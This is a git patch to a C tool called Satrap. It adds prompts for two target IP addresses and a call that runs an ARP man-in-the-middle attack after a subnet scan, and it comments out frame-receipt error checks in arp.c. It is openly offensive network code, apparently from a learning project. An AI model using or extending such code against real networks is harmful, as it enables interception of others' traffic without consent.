From 6e66662efefbb2a29bf83f1bd4510473e045bef7 Mon Sep 17 00:00:00 2001
From: Dimitri Lozeve <delta.lozeve@gmail.com>
Date: Wed, 8 Jun 2016 09:33:17 +0200
Subject: [PATCH] Added MITM attack to Satrap

---
 arp.c    | 11 ++++++-----
 satrap.c | 35 +++++++++++++++++++++++++++++++++++
 2 files changed, 41 insertions(+), 5 deletions(-)

diff --git a/arp.c b/arp.c
index 67c97a0..68b600f 100644
--- a/arp.c
+++ b/arp.c
@@ -320,11 +320,12 @@ int arp_mitm(int sockfd, int ifindex, struct sockaddr_in *ipaddr, unsigned char
      hardware addresses.  */
   send_arp_request(sockfd, ifindex, ipaddr, macaddr, *target1_ip);
   struct ether_arp reply1;
-  int n = listen_arp_frame(sockfd, &reply1);
+  listen_arp_frame(sockfd, &reply1);
+  /*printf("%d\n", n);
   if (n != 0) {
     printf("[FAIL] No frame received\n");
     exit(EXIT_FAILURE);
-  }
+    }*/
   unsigned char *macaddr1 = reply1.arp_sha;
   printf("Target 1 hardware address: %02x:%02x:%02x:%02x:%02x:%02x\n",
     	 macaddr1[0],macaddr1[1],macaddr1[2],
@@ -332,11 +333,11 @@ int arp_mitm(int sockfd, int ifindex, struct sockaddr_in *ipaddr, unsigned char
 
   send_arp_request(sockfd, ifindex, ipaddr, macaddr, *target2_ip);
   struct ether_arp reply2;
-  n = listen_arp_frame(sockfd, &reply2);
-  if (n != 0) {
+  listen_arp_frame(sockfd, &reply2);
+  /*if (n != 0) {
     printf("[FAIL] No frame received\n");
     exit(EXIT_FAILURE);
-  }
+    }*/
   unsigned char *macaddr2 = reply2.arp_sha;
   printf("Target 2 hardware address: %02x:%02x:%02x:%02x:%02x:%02x\n",
     	 macaddr2[0],macaddr2[1],macaddr2[2],
diff --git a/satrap.c b/satrap.c
index ace9f8e..c9c2e44 100644
--- a/satrap.c
+++ b/satrap.c
@@ -141,6 +141,41 @@ int main(int argc, char **argv)
 
   /* ARP scan of the subnet */
   arp_scan(sockfd, ifindex, ipaddr, macaddr, netmask);
+
+
+
+  /* ====================================================================== */
+
+  /* Selection of the targets */
+
+  char target1_ip_string[16];
+  printf("Target 1 IP: ");
+  scanf("%15s", target1_ip_string);
+  printf("%s\n", target1_ip_string);
+  struct in_addr target1_ip;
+  if (!inet_pton(AF_INET, target1_ip_string, &target1_ip)) {
+    perror("[FAIL] inet_pton() (badly formatted IP address)");
+    exit(EXIT_FAILURE);
+  }
+
+  char target2_ip_string[16];
+  printf("Target 2 IP: ");
+  scanf("%15s", target2_ip_string);
+  printf("%s\n", target2_ip_string);
+  struct in_addr target2_ip;
+  if (!inet_pton(AF_INET, target2_ip_string, &target2_ip)) {
+    perror("[FAIL] inet_pton() (badly formatted IP address)");
+    exit(EXIT_FAILURE);
+  }
+
+
+  /* ====================================================================== */
+
+  /* ARP man-in-the-middle attack */
+  printf("ARP man-in-the-middle attack on interface %s between %s and %s\n",
+	 if_name, target1_ip_string, target2_ip_string);
+
+  arp_mitm(sockfd, ifindex, ipaddr, macaddr, &target1_ip, &target2_ip);
   
   return EXIT_SUCCESS;
 }